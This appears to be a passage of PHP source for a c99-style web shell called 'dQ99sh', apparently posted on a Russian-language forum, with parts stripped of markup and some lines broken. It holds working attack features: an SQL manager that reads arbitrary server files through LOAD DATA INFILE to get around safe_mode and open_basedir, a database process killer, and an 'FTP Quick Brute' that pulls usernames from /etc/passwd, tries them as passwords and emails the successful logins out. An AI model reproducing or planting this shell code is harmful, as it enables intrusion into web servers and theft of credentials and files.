$query = "SELECT * FROM `".$sql_tbl."` ".$v."LIMIT ".$sql_tbl_ls." , ".$perpage."";
$result = mysql_query($query) or print(mysql_smarterror());
echo " Table ".htmlspecialchars($sql_tbl)." (".mysql_num_fields($result)." cols and ".$count_row[0]." rows) ";
echo "[ Structure ] ";
echo "[ Browse ] ";
echo "[ Dump ] ";
echo "[ Insert ] ";
if ($sql_tbl_act == "structure") {echo "Coming sooon! ";}
if ($sql_tbl_act == "insert") {
if (!is_array($sql_tbl_insert)) {$sql_tbl_insert = array();}
if (!empty($sql_tbl_insert_radio)) { } //Not Ready
else {
echo "Inserting row into table: ";
if (!empty($sql_tbl_insert_q)) {
$sql_query = "SELECT * FROM `".$sql_tbl."`";
$sql_query .= " WHERE".$sql_tbl_insert_q;
$sql_query .= " LIMIT 1;";
$result = mysql_query($sql_query,$sql_sock) or print(" ".mysql_smarterror());
$values = mysql_fetch_assoc($result);
mysql_free_result($result);
}
else {$values = array();}
echo " ";
echo "Insert as new row ";
if (!empty($sql_tbl_insert_q)) {echo " or Save "; echo " ";}
echo " ";
}
}
if ($sql_tbl_act == "browse") {
$sql_tbl_ls = abs($sql_tbl_ls);
$sql_tbl_le = abs($sql_tbl_le);
echo " ";
echo " ";
$b = 0;
for($i=0;$i<$numpages;$i++) {
if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo "";}
echo $i;
if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo " ";}
if (($i/30 == round($i/30)) and ($i > 0)) {echo " ";}
else {echo " ";}
}
if ($i == 0) {echo "empty";}
echo "From: To: ";
echo "";
echo "With selected: ";
echo "Delete ";
echo "
";
}
}
else {
$result = mysql_query("SHOW TABLE STATUS", $sql_sock);
if (!$result) {echo mysql_smarterror();}
else
{
echo "";
echo "With selected: ";
echo "Drop ";
echo "Empty ";
echo "Dump ";
echo "Check table ";
echo "Optimize table ";
echo "Repair table ";
echo "Analyze table ";
echo "
";
mysql_free_result($result);
}
}
}
}
}
else {
$acts = array("","newdb","serverstatus","servervars","processes","getfile");
if (in_array($sql_act,$acts)) {?> if (!empty($sql_act)) {
echo " ";
if ($sql_act == "newdb") {
echo "";
if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB "".htmlspecialchars($sql_newdb)."" has been created with success! ";}
else {echo "Can't create DB "".htmlspecialchars($sql_newdb)."". Reason: ".mysql_smarterror();}
}
if ($sql_act == "serverstatus") {
$result = mysql_query("SHOW STATUS", $sql_sock);
echo "Server-status variables: ";
echo "Name Value ";
while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "".$row[0]." ".$row[1]." ";}
echo "
";
mysql_free_result($result);
}
if ($sql_act == "servervars") {
$result = mysql_query("SHOW VARIABLES", $sql_sock);
echo "Server variables: ";
echo "Name Value ";
while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "".$row[0]." ".$row[1]." ";}
echo "
";
mysql_free_result($result);
}
if ($sql_act == "processes") {
if (!empty($kill)) {
$query = "KILL ".$kill.";";
$result = mysql_query($query, $sql_sock);
echo "Process #".$kill." was killed. ";
}
$result = mysql_query("SHOW PROCESSLIST", $sql_sock);
echo "Processes: ";
echo "ID USER HOST DB COMMAND TIME STATE INFO Action ";
while ($row = mysql_fetch_array($result, MYSQL_NUM)) { echo "".$row[0]." ".$row[1]." ".$row[2]." ".$row[3]." ".$row[4]." ".$row[5]." ".$row[6]." ".$row[7]." Kill ";}
echo "
";
mysql_free_result($result);
}
if ($sql_act == "getfile")
{
$tmpdb = $sql_login."_tmpdb";
$select = mysql_select_db($tmpdb);
if (!$select) {mysql_create_db($tmpdb); $select = mysql_select_db($tmpdb); $created = !!$select;}
if ($select)
{
$created = FALSE;
mysql_query("CREATE TABLE `tmp_file` ( `Viewing the file in safe_mode+open_basedir` LONGBLOB NOT NULL );");
mysql_query("LOAD DATA INFILE "".addslashes($sql_getfile)."" INTO TABLE tmp_file");
$result = mysql_query("SELECT * FROM tmp_file;");
if (!$result) {echo "Error in reading file (permision denied)! ";}
else
{
for ($i=0;$i $f = "";
while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) {$f .= join ("rn",$row);}
if (empty($f)) {echo "File "".$sql_getfile."" does not exists or empty! ";}
else {echo "File "".$sql_getfile."": ".nl2br(htmlspecialchars($f))." ";}
mysql_free_result($result);
mysql_query("DROP TABLE tmp_file;");
}
}
mysql_drop_db($tmpdb);
}
}
}
}
echo "
n";
if ($sql_sock) {
$affected = @mysql_affected_rows($sql_sock);
if ((!is_numeric($affected)) or ($affected < 0)){$affected = 0;}
echo " Affected rows : ".$affected." ";
}
echo "
n";
}
//End of SQL Manager
if ($act == "ftpquickbrute") {
echo " ";
echo "";
if ($win) { echo "Can't run on Windows!"; }
else {
function dQ99ftpbrutecheck($host,$port,$timeout,$login,$pass,$sh,$fqb_onlywithsh) {
if ($fqb_onlywithsh) {$TRUE = (!in_array($sh,array("/bin/FALSE","/sbin/nologin")));}
else {$TRUE = TRUE;}
if ($TRUE) {
$sock = @ftp_connect($host,$port,$timeout);
if (@ftp_login($sock,$login,$pass)) {
echo "Connected to ".$host." with login "".$login."" and password "".$pass."" . ";
ob_flush();
return TRUE;
}
}
}
if (!empty($submit)) {
if (!is_numeric($fqb_lenght)) {$fqb_lenght = $nixpwdperpage;}
$fp = fopen("/etc/passwd","r");
if (!$fp) {echo "Can't get /etc/passwd for password-list.";}
else {
if ($fqb_logging) {
if ($fqb_logfile) {$fqb_logfp = fopen($fqb_logfile,"w");}
else {$fqb_logfp = FALSE;}
$fqb_log = "FTP Quick Brute (".$sh_name.") started at ".date("d.m.Y H:i:s")."rnrn";
if ($fqb_logfile) {fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));}
}
ob_flush();
$i = $success = 0;
$ftpquick_st = getmicrotime();
while(!feof($fp)) {
$str = explode(":",fgets($fp,2048));
if (dQ99ftpbrutecheck("localhost",21,1,$str[0],$str[0],$str[6],$fqb_onlywithsh)) {
echo "Connected to ".getenv("SERVER_NAME")." with login "".$str[0]."" and password "".$str[0]."" ";
$fqb_log .= "Connected to ".getenv("SERVER_NAME")." with login "".$str[0]."" and password "".$str[0]."", at ".date("d.m.Y H:i:s")."rn";
if ($fqb_logfp) {fseek($fqb_logfp,0); fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));}
$success++;
ob_flush();
}
if ($i > $fqb_lenght) {break;}
$i++;
}
if ($success == 0) {echo "No success. connections!"; $fqb_log .= "No success. connections!rn";}
$ftpquick_t = round(getmicrotime()-$ftpquick_st,4);
echo "Done! Total time (secs.): ".$ftpquick_t." Total connections: ".$i." Success.: ".$success." Unsuccess.:".($i-$success)." Connects per second: ".round($i/$ftpquick_t,2)." ";
$fqb_log .= "rn------------------------------------------rnDone!rnTotal time (secs.): ".$ftpquick_t."rnTotal connections: ".$i."rnSuccess.: ".$success."rnUnsuccess.:".($i-$success)."rnConnects per second: ".round($i/$ftpquick_t,2)."rn";
if ($fqb_logfp) {fseek($fqb_logfp,0); fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));}
if ($fqb_logemail) {@mail($fqb_logemail,"".$sh_name." report",$fqb_log);}
fclose($fqb_logfp);
}
}
else {
$logfile = $tmpdir_logs."dQ99sh_ftpquickbrute_".date("d.m.Y_H_i_s").".log";
$logfile = str_replace("//",DIRECTORY_SEPARATOR,$logfile);
echo " ".
"Read first: ".
" Users only with shell ".
" Logging ".
"Logging to file: ".
"Logging to e-mail: ".
" ";
}
echo "
";
}
}
if ($act == "d") {
if (!is_dir($d)) { echo "$d is a not a Directory! "; }
else {
echo "Directory information: ";
if (!$win) {
echo "Owner/Group ";
$ow = posix_getpwuid(fileowner($d));
$gr = posix_getgrgid(filegroup($d));
$row[] = ($ow["name"]?$ow["name"]:fileowner($d))."/".($gr["name"]?$gr["name"]:filegroup($d));
}
echo " Perms ".view_perms_color($d)." Create time ".date("d/m/Y H:i:s",filectime($d))." Access time ".date("d/m/Y H:i:s",fileatime($d))." MODIFY time ".date("d/m/Y H:i:s",filemtime($d))."
";
}
}
if ($act == "phpinfo") {@ob_clean(); phpinfo(); dQ99shexit();}
if ($act == "security") {
echo "n".
"n".
"Open Base Dir <Редактировалось:23.09.2019 23:44:14 пользователем
Новый ответ